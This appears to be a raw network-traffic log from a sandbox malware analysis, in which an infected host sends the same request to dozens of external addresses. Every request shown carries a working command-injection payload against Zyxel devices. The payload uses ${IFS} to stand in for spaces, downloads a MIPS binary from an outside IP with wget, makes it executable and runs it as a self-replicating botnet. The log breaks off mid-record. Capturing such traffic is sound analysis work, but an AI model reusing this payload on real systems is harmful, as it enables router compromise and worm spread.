                                            Feb 2, 2024 06:21:09.568875074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3553192.168.2.1539992184.239.143.67443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.568942070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3554192.168.2.154924079.72.74.27443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.568977118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3555192.168.2.156063074.11.3.160443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.569000959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3556192.168.2.1555632192.191.89.182443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.569051027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3557192.168.2.15361545.237.20.79443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.569087982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3558192.168.2.155198834.216.84.202443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.569139957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3559192.168.2.154099667.192.66.29443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.569183111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3560192.168.2.1542900142.78.48.251443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.569228888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3561192.168.2.154365220.204.111.131443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.569266081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3562192.168.2.1538292197.134.183.93443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.569295883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3563192.168.2.1545396137.16.250.91443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.569319963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3564192.168.2.1535908141.35.53.37443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.569370985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3565192.168.2.155593049.6.129.63443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.569411993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3566192.168.2.1537134217.163.140.26443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.569463968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3567192.168.2.1544234130.92.210.233443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.569530010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3568192.168.2.155894085.137.226.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.569556952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3569192.168.2.1557872119.161.125.87443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.569593906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3570192.168.2.153523018.236.111.8443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.569622993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3571192.168.2.153971875.223.182.0443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.569655895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3572192.168.2.1534638201.177.61.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.569686890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3573192.168.2.155076238.88.71.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.569732904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3574192.168.2.154208275.135.176.214443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.569778919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3575192.168.2.153718695.154.153.121443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.569817066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3576192.168.2.154822882.8.226.9443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.569864988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3577192.168.2.1547808139.233.131.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.569896936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3578192.168.2.1552192177.20.48.13443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.569927931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3579192.168.2.154136443.152.176.189443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.569969893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3580192.168.2.15421745.145.1.11443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.570044041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3581192.168.2.1556108208.20.92.195443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.570053101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3582192.168.2.1545488139.29.23.77443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.570085049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3583192.168.2.154033036.223.84.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.570113897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3584192.168.2.1556380159.239.175.211443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.570169926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3585192.168.2.1554282173.34.200.121443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.570194960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3586192.168.2.154264669.66.19.181443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.570230961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3587192.168.2.1543690201.147.67.114443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.570283890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3588192.168.2.155598490.233.252.129443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.570333004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3589192.168.2.1559398189.61.190.35443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.570353031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3590192.168.2.1548534205.78.198.184443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.570413113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3591192.168.2.154744412.146.192.137443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.570444107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3592192.168.2.1544830135.235.175.44443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.570506096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3593192.168.2.1547856204.55.55.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.570533991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3594192.168.2.154527036.175.236.22443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.570570946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3595192.168.2.1539826196.163.24.47443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.570605993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3596192.168.2.1546264218.101.85.107443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.570653915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3597192.168.2.153563636.82.243.118443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.570709944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3598192.168.2.154672690.255.122.230443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.570710897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3599192.168.2.154703235.163.183.248443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.570781946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3600192.168.2.154554890.50.138.246443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.570831060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3601192.168.2.1538654107.148.200.250443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.570868015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3602192.168.2.1538114166.118.246.219443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.570905924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3603192.168.2.1548130131.128.189.40443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.570947886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3604192.168.2.1546894199.23.159.121443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.570977926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3605192.168.2.1547054188.133.43.185443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.571024895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3606192.168.2.1547810221.203.212.87443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.571032047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3607192.168.2.1551536108.68.181.210443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.571070910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3608192.168.2.154143259.115.203.152443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.571121931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3609192.168.2.1560256111.211.194.76443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.571167946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3610192.168.2.1548550179.7.60.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.571217060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3611192.168.2.153599054.16.66.168443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.571245909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3612192.168.2.1548528166.185.20.7443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.571293116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3613192.168.2.156015259.48.53.74443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.571324110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3614192.168.2.155159450.250.231.228443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.571357012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3615192.168.2.154213275.133.99.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.571410894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3616192.168.2.155179852.237.178.171443
                                            TimestampBytes transferredDirectionData
